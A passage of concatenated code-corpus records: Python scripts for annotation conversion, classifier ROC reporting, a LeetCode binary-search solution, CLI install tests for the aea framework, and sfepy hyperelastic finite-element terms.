2)) # an array of (start, length) pairs\r\n a[:, 0] -= 1 # `start` is 1-indexed\r\n\r\n y0 = a[:, 0] % shape[0]\r\n y1 = y0 + a[:, 1]\r\n if np.any(y1 > shape[0]):\r\n # got `y` overrun, meaning that there are a pixels in mask on 0 and shape[0] position\r\n y0 = 0\r\n y1 = shape[0]\r\n else:\r\n y0 = np.min(y0)\r\n y1 = np.max(y1)\r\n\r\n x0 = a[:, 0] // shape[0]\r\n x1 = (a[:, 0] + a[:, 1]) // shape[0]\r\n x0 = np.min(x0)\r\n x1 = np.max(x1)\r\n\r\n if x1 > shape[1]:\r\n # just went out of the image dimensions\r\n raise ValueError(\"invalid RLE or image dimensions: x1=%d > shape[1]=%d\" % (\r\n x1, shape[1]\r\n ))\r\n\r\n return [int(x0), int(y0), int(x1-x0+1), int(y1-y0+1)] #json does not recognize NumPy data types --> converted to int\r\n\r\n\r\ndef convert_annotations_detection_train(path_to_annotaion_file, path_to_categories, path_to_output_dir = \"./data/imaterialist2/\"):\r\n assert os.path.exists(path_to_output_dir)\r\n assert os.path.exists(path_to_categories)\r\n with open(path_to_categories, \"r+\") as labeljson:\r\n label_desc = json.load(labeljson)\r\n\r\n label_desc = label_desc[\"categories\"]\r\n\r\n assert os.path.exists(path_to_annotaion_file)\r\n train_images = []\r\n test_images = []\r\n image_name_to_id_dict = {}\r\n mask_id_to_encoded_pix = {}\r\n\r\n mask_id_to_attributes 
= {}\r\n train_annotations = []\r\n test_annotations = []\r\n one_nth_portion = 5\r\n with open(path_to_annotaion_file, \"r+\") as traincsv:\r\n datareader = csv.reader(traincsv)#original csv from kaggle\r\n # row includes [0:'ImageId', 1:'EncodedPixels', 2:'Height', 3:'Width', 4:'ClassId', 5:'AttributesIds']\r\n next(datareader)#ignoring the header\r\n mask_id = 0\r\n img_id = 0\r\n for row in tqdm(datareader):\r\n mask_id+=1\r\n\r\n image_dict = {}\r\n image_dict[\"file_name\"] = row[0] + \".jpg\"\r\n image_dict[\"height\"] = int(row[2])\r\n image_dict[\"width\"] = int(row[3])\r\n\r\n if row[0] not in image_name_to_id_dict: #if file name not in dict then add to dict and increase the counter\r\n img_id += 1\r\n image_dict[\"id\"] = img_id\r\n if image_dict[\"id\"] % one_nth_portion == 0: #every nth image goes to the test split, matching the annotation split below\r\n test_images.append(image_dict)\r\n else:\r\n train_images.append(image_dict)\r\n image_name_to_id_dict[row[0]] = img_id\r\n\r\n else:\r\n image_dict[\"id\"] = image_name_to_id_dict[row[0]]\r\n\r\n #storing masks\r\n mask_id_to_encoded_pix[str(mask_id)] = row[1]\r\n\r\n #storing attributes\r\n mask_id_to_attributes[str(mask_id)] = row[-1]\r\n\r\n annot_dict = {}\r\n bbox= rle2bbox(row[1],(image_dict[\"height\"],image_dict[\"width\"]))\r\n area = bbox[-1]*bbox[-2] #w*h\r\n annot_dict[\"area\"] = area\r\n annot_dict[\"bbox\"] = bbox\r\n annot_dict[\"category_id\"] = int(row[4])\r\n annot_dict[\"id\"] = mask_id\r\n annot_dict[\"image_id\"] = image_dict[\"id\"]\r\n annot_dict[\"iscrowd\"] = 0\r\n\r\n if image_dict[\"id\"] % one_nth_portion == 0:\r\n test_annotations.append(annot_dict)\r\n else:\r\n train_annotations.append(annot_dict)\r\n\r\n #with open(path_to_output_dir + \"image_name_to_id_dict.json\",\"w+\") as imgtoid:\r\n # json.dump(image_name_to_id_dict,imgtoid)\r\n #with open(path_to_output_dir + \"mask_id_to_encoded_pix.json\",\"w+\") as f:\r\n # json.dump(mask_id_to_encoded_pix,f)\r\n #with open(path_to_output_dir + \"mask_id_to_attributes.json\",\"w+\") as f:\r\n # json.dump(mask_id_to_attributes,f)\r\n #with open(path_to_output_dir + \"train_detections.json\",\"w+\") as dettrain:\r\n # json.dump({\"images\": train_images, \"annotations\": train_annotations, \"categories\": label_desc},dettrain)\r\n #with open(path_to_output_dir + \"test_detections.json\",\"w+\") as dettrain:\r\n # json.dump({\"images\": test_images, \"annotations\": test_annotations, \"categories\": label_desc},dettrain)\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n\r\n convert_annotations_detection_train(sys.argv[1],sys.argv[2] )","sub_path":"Convert_Annotation.py","file_name":"Convert_Annotation.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634660398","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated Jun 26 2017\n\n@author: Thatyana Morales\n\nDependent on Classifier_Algorithms_OneUser_NoCommand, this script handles everything involving\nprinting the data to the CSV files as well as ROC calculations and ROC curve\nplots. \n\nNote: This file and Classifier_Algorithms_OneUser_NoCommand are not run on the\ncommand line. Classifier_Algorithms_OneUser_NoCommand is to be run directly\nfrom the IDE.
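A rough usage sketch (the classifier and output file below are illustrative assumptions, not part of this project; any scikit-learn style estimator with fit and predict methods should work):\n\n from sklearn.ensemble import RandomForestClassifier\n with open('results.csv', 'w') as out_file:\n printChart(out_file, RandomForestClassifier(), isPlot='false')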
\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy import interp\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\n\nfrom Classifier_Algorithms_OneUser_NoCommand import kf, classifications, features\nimport relabelGestureSet as relabel\n\n\n\n\n# This function is used to convert the allClassifications and allPredictions\n# array to a y x n array with the gestures binarized\ndef matrix(y, n):\n np.set_printoptions(threshold='nan')\n m = np.zeros((len(y), n), dtype=np.int)\n for x in range(len(y)):\n m[x][int(y[x])] = 1 \n return (m)\n\n# Plots all ROC curves. This function is optionally called\ndef plotRoc(tpr, fpr, roc_auc, n_classes):\n \n plt.figure()\n lw = 2\n plt.plot(fpr[\"micro\"], tpr[\"micro\"],\n label='Micro-Avg ROC (area = {0:0.6f})'\n ''.format(roc_auc[\"micro\"]),\n color='deeppink', linestyle=':', linewidth=4)\n \n plt.plot(fpr[\"macro\"], tpr[\"macro\"],\n label='Macro-Avg ROC (area = {0:0.6f})'\n ''.format(roc_auc[\"macro\"]),\n color='navy', linestyle=':', linewidth=4)\n \n colors = cycle(['red', 'orange', 'yellow', 'green', 'blue',\n 'indigo', 'violet', 'gray', 'black', 'fuchsia',\n 'cadetblue', 'orchid', 'seagreen', 'olive', 'darkgoldenrod',\n 'tomato', 'sienna', 'lightskyblue', 'peru', 'sandybrown'])\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,\n label='Class {0} ROC (area = {1:0.6f})'\n ''.format(i, roc_auc[i]))\n \n plt.plot([0, 1], [0, 1], 'k--', lw=lw)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n# Prints ROC AUC for each gesture to the csv file. Also calls plotRoc if specified\n# by the user\ndef printRocCurve(f, score, test, isPlot):\n \n n_classes = len(set(classifications))\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n \n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(test[:, i], score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n \n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(test.ravel(), score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n \n \n # Compute macro-average ROC curve and ROC area\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n \n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n \n # Finally average it and compute AUC\n mean_tpr /= n_classes\n \n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n \n f.write('\\nROC AUC')\n for i in range(len(roc_auc)-1):\n if i in roc_auc:\n f.write('\\nClass: {0}, {1:0.6f}'\n ''.format(i, roc_auc[i]))\n f.close() \n \n # if the user selected to plot the ROC curve on matlib, this is where\n # the plot function is called\n if isPlot == 'true': \n plotRoc(tpr, fpr, roc_auc, n_classes)\n\ndef printChart(f, clf, isPlot):\n \n ## When an array is too large, numpy prints the corners of the array and \n ## prints ... for the center. 
For displaying purposes, these statements\n ## print the entire array and remove the periods \n np.set_printoptions(threshold='nan')\n \n ## Generalizes the script by basing the confusion matrix size off of\n ## the number of gestures in the set in the file. \n matrixSize = len(set(classifications))\n confMat = np.zeros((matrixSize, matrixSize), dtype=np.int) \n\n # confusion matrix calculations made\n allPredictions = []\n allClassifications = []\n\n for train, test in kf: \n clf.fit(features[train], classifications[train])\n predictions = clf.predict(features[test])\n allPredictions.append(predictions)\n allClassifications.append(classifications[test])\n \n \n allPredictions = np.concatenate(allPredictions)\n allClassifications = np.concatenate(allClassifications)\n \n\n#============================================================================== \n# ## needed only for the rawData128SinglePoint.csv file. This function can be \n# ## commented out/removed once new data is collected and used with this script\n# ## So when score and test are passed into printRocCurve, they just need the \n# ## matrix function\n allPredictions2 = relabel.replace(allPredictions)\n allClassifications2 = relabel.replace(allClassifications)\n# \n score = matrix(allClassifications2, len(set(allClassifications2)))\n test = matrix(allPredictions2, len(set(allPredictions2)))\n#==============================================================================\n\n ## Combines allPredictions and allClassifications into the confMat at the end\n ## REMEMBER TO REMOVE THE 2 AT THE END OF THE VARIABLES FOR THESE 2 LINES ONLY\n ## THIS IS ONLY FOR THE RAWDATA128SINGLEPOINT.CSV\n for i in range(len(allClassifications2)):\n confMat[int(allPredictions2[i])][int(allClassifications2[i])] = confMat[int(allPredictions2[i])][int(allClassifications2[i])] + 1\n \n # Classification Report returns a string that contains the chart, but\n # each element is not in a separate cell. Therefore, classRep splits\n # the string into an array of each of the elements, with 2 spaces as\n # the delimiter.
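# For instance, 'a    b'.split(\"  \") yields ['a', '', 'b']; once the comma is\n # appended in the loop below, each empty entry becomes a lone ',' and is skipped.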
\n classReport = classification_report(allClassifications,allPredictions)\n classRep = classReport.split(\"  \")\n classRep[3] += ',' #lines up the Precision, Recall, f1, support row with\n #the rest of the table\n lineUp = len(classRep) - 11 \n classRep[lineUp] += ',' #lines up the avg/total row\n \n # Neatly displays the elements into individual cells\n for i in classRep:\n i = i + ','\n if len(i) == 1:\n continue\n else:\n f.write(i)\n \n f.write('\\n')\n \n ## Writes a readable confusion matrix into the csv file \n ## (writing it as-is to the file just displays illegal characters)\n ## Also displays Accuracy calculated from classifications and predictions\n confMat = np.array2string(confMat, separator=', ')\n f.write(confMat.replace('[', '').replace(']','')) #removes the brackets created when making a numpy array\n f.write(\"\\n\\nAccuracy:, \" + (\"%.6f\"%accuracy_score(allClassifications,allPredictions)))\n f.write('\\n') \n \n # called to print ROC AUC to the csv file.\n #printRocCurve(f, score, test, isPlot)\n ","sub_path":"Python_Scripts_TM/printDataTables_OneUser_NoCommand.py","file_name":"printDataTables_OneUser_NoCommand.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122642061","text":"from typing import List\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n def binarySearch(l:int,r:int) -> int:\n if(l == r): return l\n mid = (l + r) // 2\n if(nums[mid] > nums[mid + 1]):\n return binarySearch(l,mid)\n else:\n return binarySearch(mid+1,r)\n return binarySearch(0,len(nums)-1)\n\n\n# A peak element is an element that is greater than its left and right neighbours.\n\n# Given an input array nums, where nums[i] ≠ nums[i+1], find a peak element and return its index.\n\n# The array may contain multiple peaks; in that case, returning the position of any one of them is fine.\n\n# You may assume that nums[-1] = nums[n] = -∞.\n\n# Example 1:\n\n# Input: nums = [1,2,3,1]\n# Output: 2\n# Explanation: 3 is a peak element and your function should return its index 2.\n# Example 2:\n\n# Input: nums = [1,2,1,3,5,6,4]\n# Output: 1 or 5 \n# Explanation: Your function may return index 1, where the peak element is 2;\n# or index 5, where the peak element is 6.\n# Note:\n\n# Your solution should run in O(log N) time.\n# Link: https://leetcode-cn.com/problems/find-peak-element/","sub_path":"162.
寻找峰值/pythonCode.py","file_name":"pythonCode.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98498624","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This test module contains the tests for the `aea install` sub-command.\"\"\"\nimport os\nimport tempfile\nimport unittest.mock\nfrom pathlib import Path\n\nimport yaml\nfrom ..common.click_testing import CliRunner\n\nimport aea.cli.common\nfrom aea.cli import cli\nfrom aea.configurations.base import DEFAULT_PROTOCOL_CONFIG_FILE\nfrom tests.conftest import CLI_LOG_OPTION, CUR_PATH\n\n\nclass TestInstall:\n \"\"\"Test that the command 'aea install' works as expected.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.cwd = os.getcwd()\n os.chdir(Path(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\"], standalone_mode=False)\n\n def test_exit_code_equal_to_zero(self):\n \"\"\"Assert that the exit code is equal to zero (i.e. success).\"\"\"\n assert self.result.exit_code == 0\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n\n\nclass TestInstallFromRequirementFile:\n \"\"\"Test that the command 'aea install --requirement REQ_FILE' works.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.cwd = os.getcwd()\n os.chdir(Path(CUR_PATH, \"data\", \"dummy_aea\"))\n\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\", \"-r\", \"requirements.txt\"], standalone_mode=False)\n\n def test_exit_code_equal_to_zero(self):\n \"\"\"Assert that the exit code is equal to zero (i.e. 
success).\"\"\"\n assert self.result.exit_code == 0\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n\n\nclass TestInstallFails:\n \"\"\"Test that the command 'aea install' fails when a dependency is not found.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.runner = CliRunner()\n cls.agent_name = \"myagent\"\n\n cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')\n cls.mocked_logger_error = cls.patch.__enter__()\n\n cls.cwd = os.getcwd()\n cls.t = tempfile.mkdtemp()\n os.chdir(cls.t)\n result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"create\", cls.agent_name], standalone_mode=False)\n assert result.exit_code == 0\n os.chdir(cls.agent_name)\n result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"scaffold\", \"protocol\", \"my_protocol\"], standalone_mode=False)\n assert result.exit_code == 0\n\n config_path = Path(\"protocols\", \"my_protocol\", DEFAULT_PROTOCOL_CONFIG_FILE)\n config = yaml.safe_load(open(config_path))\n config.setdefault(\"dependencies\", []).append(\"this_dependency_does_not_exist\")\n yaml.safe_dump(config, open(config_path, \"w\"))\n cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, \"install\"], standalone_mode=False)\n\n def test_exit_code_equal_to_1(self):\n \"\"\"Assert that the exit code is equal to 1 (i.e. catchall for general errors).\"\"\"\n assert self.result.exit_code == 1\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardowm the test.\"\"\"\n os.chdir(cls.cwd)\n","sub_path":"tests/test_cli/test_install.py","file_name":"test_install.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652073610","text":"from sfepy.terms.terms import *\nfrom sfepy.terms.terms_hyperelastic_base \\\n import CouplingVectorScalarTL, HyperElasticBase\nfrom sfepy.terms.terms_base import VectorVector, ScalarScalar, InstantaneousBase\n \nclass HyperElasticTLBase( HyperElasticBase ):\n \"\"\"Base class for all hyperelastic terms in TL formulation. This is not a\n proper Term!\n \"\"\"\n use_caches = {'finite_strain_tl' : [['state']]}\n mode = 'tl'\n\nclass NeoHookeanTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic neo-Hookean term. Effective stress\n :math:`S_{ij} = \\mu J^{-\\frac{2}{3}}(\\delta_{ij} -\n \\frac{1}{3}C_{kk}C_{ij}^{-1})`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`\\mu`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_he_neohook'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'trC', 'invC']\n term_function = {'stress' : terms.dq_tl_he_stress_neohook,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_neohook}\n \n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, trC, invC = family_data\n\n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, trC, invC )\n\n return out\n\nclass MooneyRivlinTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic Mooney-Rivlin term. 
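(:math:`I_2 = \\frac{1}{2}\\left((C_{kk})^2 - C_{ij}C_{ji}\\right)` in the stress below is the second\n invariant of the right Cauchy-Green deformation tensor :math:`C`.)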
Effective stress\n :math:`S_{ij} = \\kappa J^{-\\frac{4}{3}} (C_{kk} \\delta_{ij} - C_{ij}\n - \\frac{2}{3 } I_2 C_{ij}^{-1})`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`\\kappa`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_he_mooney_rivlin'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'trC', 'invC', 'C', 'in2C']\n term_function = {'stress' : terms.dq_tl_he_stress_mooney_rivlin,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_mooney_rivlin}\n\n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, trC, invC, vecC, in2C = family_data\n\n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, trC, invC, vecC, in2C )\n\n return out\n\nclass BulkPenaltyTLTerm( VectorVector, HyperElasticTLBase ):\n r\"\"\"\n :Description:\n Hyperelastic bulk penalty term. Stress\n :math:`S_{ij} = K(J-1)\\; J C_{ij}^{-1}`.\n\n :Definition:\n .. math::\n \\int_{\\Omega} S_{ij}(\\ul{u}) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n material : :math:`K`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n\n name = 'dw_tl_bulk_penalty'\n arg_types = ('material', 'virtual', 'state')\n\n family_data_names = ['detF', 'invC']\n term_function = {'stress' : terms.dq_tl_he_stress_bulk,\n 'tangent_modulus' : terms.dq_tl_he_tan_mod_bulk }\n\n def compute_crt_data( self, family_data, mode, **kwargs ):\n mat = self.get_args( ['material'], **kwargs )[0]\n\n detF, invC = family_data\n \n if mode == 0:\n out = nm.empty_like( invC )\n fun = self.term_function['stress']\n else:\n shape = list( invC.shape )\n shape[-1] = shape[-2]\n out = nm.empty( shape, dtype = nm.float64 )\n fun = self.term_function['tangent_modulus']\n\n fun( out, mat, detF, invC )\n\n return out\n\nclass BulkPressureTLTerm(CouplingVectorScalarTL, HyperElasticTLBase):\n r\"\"\"\n :Description:\n Hyperelastic bulk pressure term. Stress\n :math:`S_{ij} = -p J C_{ij}^{-1}`.\n\n :Definition:\n .. 
math::\n \\int_{\\Omega} S_{ij}(p) \\delta E_{ij}(\\ul{u};\\ul{v})\n\n :Arguments:\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`,\n state_p : :math:`p`\n \"\"\"\n\n name = 'dw_tl_bulk_pressure'\n arg_types = ('virtual', 'state', 'state_p')\n use_caches = {'finite_strain_tl' : [['state']],\n 'state_in_volume_qp' : [['state_p']]}\n\n term_function = {'stress' : terms.dq_tl_stress_bulk_pressure,\n 'tangent_modulus_u' : terms.dq_tl_tan_mod_bulk_pressure_u}\n\n def __init__(self, *args, **kwargs):\n Term.__init__(self, *args, **kwargs)\n\n self.function = {\n 'element_contribution' : terms.dw_he_rtm,\n 'element_contribution_dp' : terms.dw_tl_volume,\n }\n self.crt_data = Struct(stress = None,\n tan_mod = nm.array([0], ndmin=4))\n\n def __call__(self, diff_var=None, chunk_size=None, **kwargs):\n term_mode, = self.get_kwargs(['term_mode'], **kwargs)\n virtual, state, state_p = self.get_args(**kwargs)\n apv, vgv = self.get_approximation(virtual)\n aps, vgs = self.get_approximation(state_p)\n\n self.set_data_shape(apv, aps)\n shape, mode = self.get_shape_grad(diff_var, chunk_size)\n\n cache = self.get_cache('finite_strain_tl', 0)\n family_data = cache(['detF', 'invC'], self, 0, state=state)\n\n if term_mode is None:\n\n if mode < 2:\n crt_data = self.compute_crt_data(family_data, mode, **kwargs)\n if mode == 0:\n self.crt_data.stress = crt_data\n else:\n self.crt_data.tan_mod = crt_data\n\n fun = self.function['element_contribution']\n\n mtxF, detF = cache(['F', 'detF'], self, 0, state=state)\n\n for out, chunk in self.char_fun(chunk_size, shape):\n status = fun(out, self.crt_data.stress,\n self.crt_data.tan_mod, mtxF, detF,\n vgv, chunk, mode, 0)\n yield out, chunk, status\n else:\n fun = self.function['element_contribution_dp']\n\n mtxF, invC, detF = cache(['F', 'invC', 'detF'],\n self, 0, state=state)\n\n bf = aps.get_base('v', 0, self.integral)\n for out, chunk in self.char_fun(chunk_size, shape):\n status = fun(out, bf, mtxF, invC, detF, vgv, 1, chunk, 1)\n yield -out, chunk, status\n\n\n elif term_mode == 'd_eval':\n raise NotImplementedError\n\n elif term_mode in ['strain', 'stress']:\n\n if term_mode == 'strain':\n out_qp = cache('E', self, 0, state=state)\n\n elif term_mode == 'stress':\n out_qp = self.compute_crt_data(family_data, 0, **kwargs)\n \n shape = (chunk_size, 1) + out_qp.shape[2:]\n for out, chunk in self.char_fun(chunk_size, shape):\n status = vgv.integrate_chunk(out, out_qp[chunk], chunk)\n out1 = out / vgv.variable(2)[chunk]\n\n yield out1, chunk, status\n\n def compute_crt_data(self, family_data, mode, **kwargs):\n detF, invC = family_data\n\n p, = self.get_args(['state_p'], **kwargs)\n\n cache = self.get_cache('state_in_volume_qp', 0)\n p_qp = cache('state', self, 0, state=p, get_vector=self.get_vector)\n\n if mode == 0:\n out = nm.empty_like(invC)\n fun = self.term_function['stress']\n elif mode == 1:\n shape = list(invC.shape)\n shape[-1] = shape[-2]\n out = nm.empty(shape, dtype=nm.float64)\n fun = self.term_function['tangent_modulus_u']\n else:\n raise ValueError('bad mode! (%d)' % mode)\n\n fun(out, p_qp, detF, invC)\n\n return out\n\nclass VolumeTLTerm(CouplingVectorScalarTL, InstantaneousBase, Term):\n r\"\"\"\n :Description:\n Volume term (weak form) in the total Lagrangian formulation.\n\n :Definition:\n .. 
math::\n \\begin{array}{l}\n \\int_{\\Omega} q J(\\ul{u}) \\\\\n \\mbox{volume mode: vector for } K \\from \\Ical_h: \\int_{T_K}\n J(\\ul{u}) \\\\\n \\mbox{rel\\_volume mode: vector for } K \\from \\Ical_h:\n \\int_{T_K} J(\\ul{u}) / \\int_{T_K} 1\n \\end{array}\n\n :Arguments:\n virtual : :math:`q`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_volume'\n arg_types = ('virtual', 'state')\n use_caches = {'finite_strain_tl' : [['state',\n {'F' : (2, 2),\n 'invC' : (2, 2),\n 'detF' : (2, 2)}]]}\n\n function = staticmethod(terms.dw_tl_volume)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n virtual, state = self.get_args( **kwargs )\n term_mode = kwargs.get('term_mode')\n\n apv, vgv = self.get_approximation(state)\n aps, vgs = self.get_approximation(virtual)\n\n self.set_data_shape(apv, aps)\n\n cache = self.get_cache('finite_strain_tl', 0)\n ih = self.arg_steps[state.name] # issue 104!\n mtxF, invC, detF = cache(['F', 'invC', 'detF'], self, ih, state=state)\n\n if term_mode == 'volume':\n n_el, _, _, _ = self.data_shape_s\n shape, mode = (n_el, 1, 1, 1), 2\n\n elif term_mode == 'rel_volume':\n n_el, _, _, _ = self.data_shape_s\n shape, mode = (n_el, 1, 1, 1), 3\n\n else:\n shape, mode = self.get_shape_div(diff_var, chunk_size)\n if self.step == 0: # Just init the history in step 0.\n raise StopIteration\n\n bf = aps.get_base('v', 0, self.integral)\n\n return (bf, mtxF, invC, detF, vgv, 0), shape, mode\n\nclass DiffusionTLTerm(ScalarScalar, Term):\n r\"\"\"\n :Description:\n Diffusion term in the total Lagrangian formulation with\n linearized deformation-dependent permeability\n :math:`\\ull{K}(\\ul{u}) = J \\ull{F}^{-1} \\ull{k} f(J) \\ull{F}^{-T}`,\n where :math:`\\ul{u}` relates to the previous time step :math:`(n-1)`\n and\n :math:`f(J) = \\max\\left(0, \\left(1 + \\frac{(J - 1)}{N_f}\\right)\\right)^2`\n expresses the dependence on volume compression/expansion.\n\n :Definition:\n .. 
math::\n \\int_{\\Omega} \\ull{K}(\\ul{u}^{(n-1)}) : \\pdiff{q}{X} \\pdiff{p}{X}\n\n :Arguments:\n material_1 : :math:`\\ull{k}`,\n material_2 : :math:`N_f`,\n virtual : :math:`q`,\n state : :math:`p`,\n parameter : :math:`\\ul{u}^{(n-1)}`\n \"\"\"\n name = 'dw_tl_diffusion'\n arg_types = ('material_1', 'material_2', 'virtual', 'state', 'parameter')\n use_caches = {'grad_scalar' : [['state']],\n 'finite_strain_tl' : [['parameter',\n {'F' : (2, 2),\n 'invC' : (2, 2),\n 'detF' : (2, 2)}]]}\n\n function = staticmethod(terms.dw_tl_diffusion)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n perm, ref_porosity, virtual, state, par = self.get_args(**kwargs)\n term_mode = kwargs.get('term_mode')\n\n apv, vgv = self.get_approximation(par)\n aps, vgs = self.get_approximation(virtual)\n\n self.set_data_shape(aps)\n\n cache = self.get_cache('finite_strain_tl', 0)\n # issue 104!\n if self.step == 0:\n ih = 0\n else:\n ih = 1\n mtxF, detF = cache(['F', 'detF'], self, ih, state=par)\n\n if term_mode == 'diffusion_velocity':\n n_el, n_qp, dim, n_ep = self.data_shape\n shape, mode = (n_el, 1, dim, 1), 2\n\n else:\n shape, mode = self.get_shape(diff_var, chunk_size)\n if self.step == 0: # Just init the history in step 0.\n raise StopIteration\n \n cache = self.get_cache('grad_scalar', 0)\n gp = cache('grad', self, 0, state=state, get_vector=self.get_vector)\n\n return (gp, perm, ref_porosity, mtxF, detF, vgv), shape, mode\n\nclass SurfaceTractionTLTerm(VectorVector, Term):\n r\"\"\"\n :Description:\n Surface traction term in the total Lagrangian formulation, expressed\n using :math:`\\ul{\\nu}`, the outward unit normal vector w.r.t. the\n undeformed surface, :math:`\\ull{F}(\\ul{u})`, the deformation gradient,\n :math:`J = \\det(\\ull{F})`, and :math:`\\ull{\\sigma}` a given traction,\n often equal to a given pressure, i.e.\n :math:`\\ull{\\sigma} = \\pi \\ull{I}`.\n\n :Definition:\n .. 
math::\n \\int_{\\Gamma} \\ul{\\nu} \\cdot \\ull{F}^{-1} \\cdot \\ull{\\sigma} \\cdot\n \\ul{v} J\n\n :Arguments:\n material : :math:`\\ull{\\sigma}`,\n virtual : :math:`\\ul{v}`,\n state : :math:`\\ul{u}`\n \"\"\"\n name = 'dw_tl_surface_traction'\n arg_types = ('material', 'virtual', 'state')\n integration = 'surface_extra'\n use_caches = {'finite_strain_surface_tl' : [['state']]}\n\n function = staticmethod(terms.dw_tl_surface_traction)\n\n def get_fargs(self, diff_var=None, chunk_size=None, **kwargs):\n trac_qp, virtual, state = self.get_args(**kwargs)\n ap, sg = self.get_approximation(virtual)\n sd = ap.surface_data[self.region.name]\n\n n_fa, n_qp = ap.get_s_data_shape(self.integral,\n self.region.name)[:2]\n n_el, dim, n_ep = ap.get_v_data_shape()\n self.data_shape = (n_fa, n_qp, dim, n_ep)\n shape, mode = self.get_shape(diff_var, chunk_size)\n\n cache = self.get_cache('finite_strain_surface_tl', 0)\n detF, invF = 